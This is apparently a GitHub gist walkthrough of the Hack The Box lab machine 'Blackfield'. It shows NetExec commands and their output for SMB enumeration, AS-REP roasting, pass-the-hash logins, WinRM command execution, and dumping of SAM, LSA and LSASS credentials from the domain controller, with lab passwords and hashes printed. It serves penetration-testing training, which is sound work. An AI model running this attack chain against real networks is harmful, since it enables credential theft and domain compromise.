Skip to content

Instantly share code, notes, and snippets.

@mpgn
Last active April 17, 2024 15:02
Show Gist options
  • Save mpgn/406c1f2cd918d24fcabb8bad4575e8fc to your computer and use it in GitHub Desktop.
Save mpgn/406c1f2cd918d24fcabb8bad4575e8fc to your computer and use it in GitHub Desktop.
Blackfield vs NetExec for fun and profit @mpgn_x64

Blackfield vs NetExec

Support:


  1. Getting domain info
netexec smb 10.10.10.192
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
  1. Anonymous logon
netexec smb 10.10.10.192 -u 'anonymous' -p ''
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\anonymous: 
  1. Getting shares
netexec smb 10.10.10.192 -u 'anonymous' -p '' --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\anonymous: 
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic                        Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON                        Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL                          Logon server share 
  1. Getting list of files in shares
netexec smb 10.10.10.192 -u 'anonymous' -p '' -M spider_plus
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\anonymous: 
SPIDER_P... 10.10.10.192    445    DC01             [*] Started spidering plus with option:
SPIDER_P... 10.10.10.192    445    DC01             [*]        DIR: ['print$', 'ipc$']
SPIDER_P... 10.10.10.192    445    DC01             [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.10.10.192    445    DC01             [*]       SIZE: 51200
SPIDER_P... 10.10.10.192    445    DC01             [*]     OUTPUT: /tmp/nxc_spider_plus

# no readable files, we miss all the username
cat /tmp/nxc_spider_plus/10.10.10.192.json
{
    "profiles$": {}
}
  1. AS-REP Roast
netexec ldap 10.10.10.192 -u /tmp/wordlist -p '' --asreproast  /tmp/kerberos.txt --kdc 10.10.10.192
LDAP        10.10.10.192    389    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP        10.10.10.192    389    DC01             [email protected]:463841df869d5191fb527e7da2d7c1f3$63f60bc12dbf5e1244dadc984314b3fd513918c051e81e50943758de0fdb83d3f1ee51ede148bea256141d8c804de71fa88d17f03ec669fa1593652fc9363f81ac3cb735e0271a0a4569fe6094879e24abeb710cfd7844670d062967b46808242ea98b0868b53d7c818eddf27c2d7864c9c8dd1db8a938824c2614d53ee1d304390547cd019ca32a14aec5cd785255ed9fba039fea9e4652cfa277cc71c9796da94c3d3f346407b06db9db96e702e0061da735650c6c12e387ec67635662770f0309ea8a13fdb281c2f5b8c041795d0b763837a85ec8c5f6d2951b1d9b094575845fae5638148a41884b3e3b7aaa5acc6883ce62
  1. Access check
netexec winrm 10.10.10.192 -u support -p '#00^BlackKnight'
WINRM       10.10.10.192    5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM       10.10.10.192    5985   DC01             [*] http://10.10.10.192:5985/wsman
WINRM       10.10.10.192    5985   DC01             [-] BLACKFIELD.local\support:#00^BlackKnight

netexec ldap 10.10.10.192 -u support -p '#00^BlackKnight' --kdc 10.10.10.192
LDAP        10.10.10.192    389    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP        10.10.10.192    389    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight

netexec smb 10.10.10.192 -u support -p '#00^BlackKnight'
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 

netexec smb 10.10.10.192 -u support -p '#00^BlackKnight' --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic                        Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share 
  1. Kerberoasting
netexec ldap 10.10.10.192 -u support -p '#00^BlackKnight' --kerberoasting /tmp/kerbe --kdc 10.10.10.192
LDAP        10.10.10.192    389    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP        10.10.10.192    389    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight
LDAP        10.10.10.192    389    DC01             [-] No entries found!
  1. Shell as svc_backup
netexec smb 10.10.10.192 -u audit2020 -p '0xdf!!!'
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:0xdf!!! 

netexec smb 10.10.10.192 -u audit2020 -p '0xdf!!!' --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:0xdf!!! 
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic        READ            Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share 

crackmapexec smb 10.10.10.192 -u audit2020 -p '0xdf!!!' -M spider_plus 
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:0xdf!!! 
SPIDER_P... 10.10.10.192    445    DC01             [*] Started spidering plus with option:
SPIDER_P... 10.10.10.192    445    DC01             [*]        DIR: ['print$', 'ipc$']
SPIDER_P... 10.10.10.192    445    DC01             [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.10.10.192    445    DC01             [*]       SIZE: 51200
SPIDER_P... 10.10.10.192    445    DC01             [*]     OUTPUT: /tmp/nxc_spider_plus

grep "memo" /tmp/nxc_spider_plus/10.10.10.192.json
        "memory_analysis/RuntimeBroker.zip": {
        "memory_analysis/ServerManager.zip": {
        "memory_analysis/WmiPrvSE.zip": {
        "memory_analysis/conhost.zip": {
        "memory_analysis/ctfmon.zip": {
        "memory_analysis/dfsrs.zip": {
        "memory_analysis/dllhost.zip": {
        "memory_analysis/ismserv.zip": {
        "memory_analysis/lsass.zip": {
        "memory_analysis/mmc.zip": {
        "memory_analysis/sihost.zip": {
        "memory_analysis/smartscreen.zip": {
        "memory_analysis/svchost.zip": {
        "memory_analysis/taskhostw.zip": {
        "memory_analysis/winlogon.zip": {
        "memory_analysis/wlms.zip": {
        "tools/sleuthkit-4.8.0-win32/bin/api-ms-win-core-memory-l1-1-0.dll": {

# Go get the lsassy using smbclient or dump everything using cme
netexec smb 10.10.10.192 -u audit2020 -p '0xdf!!!' -M spider_plus -o READ_ONLY=false
  1. Shell over WinRM
netexec smb 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\svc_backup 9658d1d1dcd9250115e2205d9f48400d 

netexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
WINRM       10.10.10.192    5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM       10.10.10.192    5985   DC01             [*] http://10.10.10.192:5985/wsman
WINRM       10.10.10.192    5985   DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)

netexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -x 'whoami;hostname'
WINRM       10.10.10.192    5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM       10.10.10.192    5985   DC01             [*] http://10.10.10.192:5985/wsman
WINRM       10.10.10.192    5985   DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)
WINRM       10.10.10.192    5985   DC01             [+] Executed command
WINRM       10.10.10.192    5985   DC01             blackfield\svc_backup
DC01
  1. For fun and profit

sam

netexec smb 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee --sam
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\administrator 184fb5e5178480be64824d4cd53b99ee (Pwn3d!)
SMB         10.10.10.192    445    DC01             [+] Dumping SAM hashes
SMB         10.10.10.192    445    DC01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
SMB         10.10.10.192    445    DC01             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.192    445    DC01             DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

lsa

netexec smb 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee --lsa
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\administrator 184fb5e5178480be64824d4cd53b99ee (Pwn3d!)
SMB         10.10.10.192    445    DC01             [+] Dumping LSA secrets
SMB         10.10.10.192    445    DC01             BLACKFIELD\DC01$:aes256-cts-hmac-sha1-96:9a1cbed11eac98cd2382509615cafd99f9ead2cc2e48352e269d5a05d50652bd
SMB         10.10.10.192    445    DC01             BLACKFIELD\DC01$:aes128-cts-hmac-sha1-96:6e4e93262b357cf298c60538d6373f26
SMB         10.10.10.192    445    DC01             BLACKFIELD\DC01$:des-cbc-md5:45d6dacdd57a07df
SMB         10.10.10.192    445    DC01             BLACKFIELD\DC01$:aad3b435b51404eeaad3b435b51404ee:9e3d10cc537937888adcc0d918813a24:::
SMB         10.10.10.192    445    DC01             BLACKFIELD\Administrator:###_ADM1N_3920_###
SMB         10.10.10.192    445    DC01             dpapi_machinekey:0xd4834e39bca0e657235935730c045b1b9934f690
dpapi_userkey:0x9fa187c3b866f3a77c651559633e2e120bc8ef6f
SMB         10.10.10.192    445    DC01             NL$KM:8801b205db707a0fef52df0696764ca4bd6e62d106631a7e312fa26df86c4250fc8d5ca4fc461bdc7eca7e767f5ec274cfebb61f998a29cf2cd11d55c6012e6f

lsass

netexec smb 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee -M lsassy
[-] Failed loading module at /usr/local/lib/python3.7/dist-packages/crackmapexec-5.1.0.dev0-py3.7.egg/cme/modules/slinky.py: No module named 'pylnk3'
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\administrator 184fb5e5178480be64824d4cd53b99ee (Pwn3d!)
LSASSY      10.10.10.192    445    DC01             BLACKFIELD\Administrator 184fb5e5178480be64824d4cd53b99ee
LSASSY      10.10.10.192    445    DC01             BLACKFIELD.local\Administrator ###_ADM1N_3920_###

ntds

netexec smb 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee --ntds
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\administrator 184fb5e5178480be64824d4cd53b99ee (Pwn3d!)
SMB         10.10.10.192    445    DC01             [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.10.192    445    DC01             [-] Could not connect: timed out


# i'm not the only one, puifff
secretsdump.py administrator:###_ADM1N_3920_###@10.10.10.192 -just-dc
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Could not connect: timed out
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up... 

Enjoy netexec, make sure you have the latest version !

Bye, @mpgn_x64

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment